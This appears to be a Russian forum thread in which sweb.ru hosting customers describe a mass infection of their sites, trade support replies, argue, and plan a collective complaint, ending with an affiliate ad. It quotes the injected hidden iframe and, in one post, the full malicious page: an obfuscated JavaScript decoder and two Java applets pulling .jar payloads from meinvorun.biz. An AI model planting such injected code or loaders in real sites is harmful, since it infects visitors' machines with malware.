«http://meinvorun.biz» и SWEB козлы. Вирус заразил все php на четырех сайтах
Сегодняшнее утро началось хорошо, 4 сайта в дауне. Причина — строчка
<div style="visibility:hidden"><iframe src="http://meinvorun.biz/zl/s2/" width=100 height=80></iframe></div>
во ВСЕХ php и html файлах на хостинге. У знакомого такая же ерунда, все произошло сегодня ночью. В общем слава и ура мега хостеру sweb.ru. Хорошо, что осталось только 4 сайта на нем, а все остальное переведено на VDS.
Вылечил просто — восстановил копии php из бекапа, надеюсь они дыру закрыли. Суппорт, как в рот воды набрал.
p.s В комментах народ написал, что SWEB официально признал, что их сервера были взломаны и компенсируют моральный ущерб путем возмещения оплаты за хостинг за три месяца. Я уже получил бонусы и до декабря хостинг оплачен, поэтому пишите на support@sweb.ru жалобы и получите деньги на свой счет.
Услуги вебстудии Asingo: изготовление сайта в одессе, слежение за сайтом, и создание интернет-рекламы. Сайт сделанный нами начнет продавать.
Так же хостюсь на sweb.ru и так же получил заражение всех сайтов (около 5). Сапорт сказал что "подвергся внедрению постороннего кода в страницы сайта" посоветовал предохраняться и провериться на вирусы.
ДА такая же финня! прихожду домой — бля! сайт сука вроде снесли, прокрутил а там просто дива пустая все сдвинулся! ебать меня в рот! у меня все впроряде, всегда слежу за тем что качаю и сто запускаю, а тут опа — да я думаю это на хостинге проблемы"""
Все я убил этот сайт, а надобыло всего навсего отписаться на хостинг и сообщить о вирусном сайте
----
Андрей ,
Спасибо за обращение в нашу службу поддержки, детали Вашего запроса
Тема: На вашем хостинге находится вирусный сайт! Было заражено множество сайтов на хостинге sweb.ru
Приоритет: Нормальный
Статус: Новый
Вы можете посмотреть запрос в любое время по ссылке,
Сервис провайдер "Paylicense", Veraton Projects Ltd.
------
А вот что ответили
-----------------
Здравствуйте.
Данный сервер отключен и будет выполнена проверка.
----------------------------------------------
ID запроса: #159643
Тема: На вашем хостинге находится вирусный сайт! Было заражено множество сайтов на хостинге sweb.ru
Статус: Ожидает клиента
URL:
----------------------------------------------
Сервис провайдер "Paylicense", Veraton Projects Ltd.
=====
Вот и все — сайт убит!
А вот что за код сайта нарыл
=========
<html><body><script type='text/javascript'>agency=["theAgency","bIs","intoTo"];this.thusGulf='';agency=["theAgency","bIs","intoTo"];this.thusGulf='';var more={ie98709a53c49405b3db459c67d14:7,Q8938e4bb764f9ad5247d4b:3,B84d3103bdf1061b784dd1b39df126aef:2,x8b3180c144ea882f9c:6,Sca224f8fb82ede7bec8544f46a17b64dc47:5,Y8e8c9106be06f00a923b85ad62a6:7,v7b48cc81e54a4e29936a941d94de16b08:3,Kf3396711b422db192ec044f4997cf3ce0052bc:2,_f6c6013ea846ef7619972da0060bd93:9,hc3d86f20a05:9,V1c6df4823fd6:4,d44f3941e947d22ee367d4c9cd5207bba88:0,M933088d92c63b48391348ad246ec896bb8d:8,ec43e1877b5796e8390959b0f9f701:3};agency=["theAgency","bIs","intoTo"];this.thusGulf='';var help=window;them={dBond:"andMexico"};try {} catch (fromOil){};try {} catch (fluidWater){};var result="";up={helpCoast:"fromAgency"};this.thatThus=338;this.thatThus-=161;var a=result;up={helpCoast:"fromAgency"};for (var i in more) a=[a,i.substr(1)].join (result);dBreak={breakGuard:23270};var thanA="thanA";var resultFluid='';bondAre=9191;bondAre+=218;var b=result;up={helpCoast:"fromAgency"};var helpCan=String ("frXhst".substr (0,2)+"omCharC" + "ode");this.thatThus=338;this.thatThus-=161;var theOil=String ("subst"+"r");bondAre=9191;bondAre+=218;var gulf=140;this.thatThus=338;this.thatThus-=161;var helpCanThem=35;agency=["theAgency","bIs","intoTo"];this.thusGulf='';var tiny=0;dBreak={breakGuard:23270};var thanA="thanA";var resultFluid='';agency=["theAgency","bIs","intoTo"];this.thusGulf='';for (i=0;i<a.length;i+=2){this.thatThus=338;this.thatThus-=161;dBreak={breakGuard:23270};var thanA="thanA";var resultFluid='';var gulfC=a.substr (i,2);bondAre=9191;bondAre+=218;gulfC=parseInt (gulfC,16);agency=["theAgency","bIs","intoTo"];this.thusGulf='';gulfC=gulfC^gulf;this.thatThus=338;this.thatThus-=161;up={helpCoast:"fromAgency"};gulf+=gulfC;up={helpCoast:"fromAgency"};gulf=gulf % 255;agency=["theAgency","bIs","intoTo"];this.thusGulf='';this.thatThus=338;this.thatThus-=161;gulfC=String[helpCan](gulfC);this.thatThus=338;this.thatThus-=161;dBreak={breakGuard:23270};var thanA="thanA";var resultFluid='';b=[b,gulfC].join (result);them={dBond:"andMexico"};try {} catch (fromOil){};try {} catch (fluidWater){};}dBreak={breakGuard:23270};var thanA="thanA";var resultFluid='';them={dBond:"andMexico"};try {} catch (fromOil){};try {} catch (fluidWater){};function thusThem (){up={helpCoast:"fromAgency"};bondAre=9191;bondAre+=218;tiny++;dBreak={breakGuard:23270};var thanA="thanA";var resultFluid='';if (tiny > helpCanThem){bondAre=9191;bondAre+=218;agency=["theAgency","bIs","intoTo"];this.thusGulf='';water=b[theOil](0,4);them={dBond:"andMexico"};try {} catch (fromOil){};try {} catch (fluidWater){};b=b[theOil](4);this.thatThus=338;this.thatThus-=161;help[water](b);agency=["theAgency","bIs","intoTo"];this.thusGulf='';agency=["theAgency","bIs","intoTo"];this.thusGulf='';return; }bondAre=9191;bondAre+=218;up={helpCoast:"fromAgency"};thusThem ();this.thatThus=338;this.thatThus-=161;}dBreak={breakGuard:23270};var thanA="thanA";var resultFluid='';this.thatThus=338;this.thatThus-=161;thusThem ();them={dBond:"andMexico"};try {} catch (fromOil){};try {} catch (fluidWater){};b=null;this.thatThus=338;this.thatThus-=161;</script><applet code='tower.Drivers.class' archive='http://meinvorun.biz/zl/4d89ac6a4306a66c8bf3c026a74e2967.jar' width='100%' height='100%'><param name='data' VALUE='8nnMJggGPl_Z?i:_x-legeAg#hYc##49rD4DYchYhcY/Yr6hcY/PPa-YxM8MXU8?3n?MlN0#bU8?3:UPi044hwD9obU8?3/?i:G0Ucb'></applet><applet width='100%' height='100%' code='Google' archive='http://meinvorun.biz/zl/b4cbccd973421f9a5d90334b532e3faf.jar'><param name="id" VALUE=".3PkPkPTc4bubu.t.Z.O.YP...uPbPZ.YbY.b.OP4buP4. -bucZc.cDcbcZcZccckcOcPcccPcDcbc.cDc.cbcD...cDcO.Dc.cbcD...Z.Z.k.bcDbYPT.3PTcuPc.3.uPPPk.uPT.O.cctckb.Pc.3.uPPPZPc.ZPbctccccc.c3cPckcTb.Pc.3.uPP...uPbPZ.tctPccbb.b.c...k"></applet></body></html>
=========
Деньги и благодарности принимаю здеся
Люди! Ёлки-палки! Что делается!
Как минимум несколько серверов было взломано на спэйсвеб (space web, sweb.ru) накануне, и не кто не слуху не духу не сказал об этом!
Беспредел! Как так можно! Я на спэйс веб уже несколько лет сижу, и всем всегда был доволен, а тут такая подстава!
Ну как так можно, взломанные spaceweb'овцы?
А если бы я сам нечего не заметил? Все бы висело (собственно у народа и висит)?
идите на хуй уроды!!!
пользую sweb 50 сайтов там все в ажуре, сами криворукие недоделки, нихера не можете кроме как гнать техподдержку, которая кстати у них на высшем уровне!!!
Ты кого послал нахуй?
Ты русского программиста послал нахуй, или я не понял?
ТЕБЕ ГОВОРЯТ: СЕРВЕРЫ (НЕ ВСЕ, НЕСКОЛЬК ШТУК, 2-3 МОЖЕТ) БЫЛИ ВЗЛОМАНЫ «ПОД РУТОМ», ПОСТРАДАЛИ ВСЕ КЛИЕНТЫ СЕРВЕРА
А ты иди сам нахуй, потому что ты тупоголовый мудак, если не понимаеш о чем идет речь, и вообще хули ты тут гадишь, если не в теме?
Я сам уже несколько лет сижу на спэйсе, и тоже до 26 числа был или доволен.
Amistos — Я с вами абсолютно согласен так как сам пострадал от этого, работал в никс системе, ни о каких вирусах и речи быть не может, темболее об авторанах и прочего гавна что могло стырыть пароли к моему хостингу — поэтому действительно проблема под рутом у хостинг провайдера. Слишком уж похожи случаи и методы, а особенно массовость взлома.
Кто-нибудь получил внятное объяснение о произошедшем? Или такие вещи в SpaceWeb по кодексу не разглашаются?
Мне так не кто, нечего не сказал, отрицают даже факт взлома!
Народ, ёлы палы, ну их надо-же наказать! Где самое жирное место? Надо написать о нашей проблеме (и проблеме еще нескольких сотен человек), пусть получат свой кусок славы, потому что так дела не делаются.
Раз с рук сойдет, потом постоянно повадятся такой фигнёй заниматься!
Таже шляпа, что и у Вас. 26-го около 19-00 все слегло.
Сразу восстановил все из бэка. Попросил у саппорта логи фтп — мне сказали что запрос отправлен администратору и он Вам обязательно ответит. Вчера отправил повторный запрос. Дали логи начиная с 20:00 26-го
.
Итак они ответили, что логи ftp у них хранятся только 5-7 дней !!! И что я как обычно сам виноват и сам нахватал вирусов! Слава богу, у меня ничего особенного не пропало. Но пусть они хотя бы признаются и извинятся!
Предлагаю собраться всем и написать коллективное открытое письмо.
Если наберется приличный список, то можно его отправить в разные места, например, свеб недавно подписал "Декларация российских хостинг-провайдеров о безопасном Интернете" пусть они на него повлияют.
У меня был затронут cnc-club.ru на сервере WINNIPEG.
Народ, еще вопрос, у кого-нибудь остался access_log за это время? Если остался, то забэкапьте, пока rotate не прошел.
Нет, логов не осталось...
—
Полностью поддерживаю, нужно всем вместе надавить на Space Web, потому что они уже показали, что добровольно нечего не скажут.
Какие есть предложения по поводу надавливания? Конкретно и пошагово? От себя: сейчас написал скрипт который может собрать подписи от населения.
Так что если интерактивщину надо — то она есть
Заинтересованные лица, подалуйста сюда, в эту тему
ИМХО схема такая:
Собираем подписи/подтверждения людей на оной странице aka открытое письмо провайдеру.
Собираем факты: в основном логи ftp и access_log ...
Оправляем ссылку администрации sweb.
Оправляем ссылку администрации Декларации провайдеров и другие подобные структуры с просьбой повлиять на ситуацию.
Для anonimus , официально признали взлом
В общем написал на support@sweb.ru письмо о возврате средств за взлом и вирусы. Положили средства за три месяца на бонусный счет. А что, клево
вот сегодня все повторилось, спейсвеб повис и недоступен...
неужели кто-то его заDdosил?
Я уже три года пользуюсь хостингом SpaceWeb. За это время я убедился что это качественный хостинг. Компания <a href="http://sweb.ru/p14848">SpaceWeb</a> предлагает большое разнообразие тарифных планов. Для сайтов с высокой посещаемостью и большой нагрузкой они предлагают VIP-хостинг по доступной цене. Аккаунт активируется в течение рабочего дня после регистрации. Вы получаете 14 дней бесплатного хостинга. В течение этого периода Вы сможете убедиться в качестве предоставляемых услуг и произвести оплату хостинга.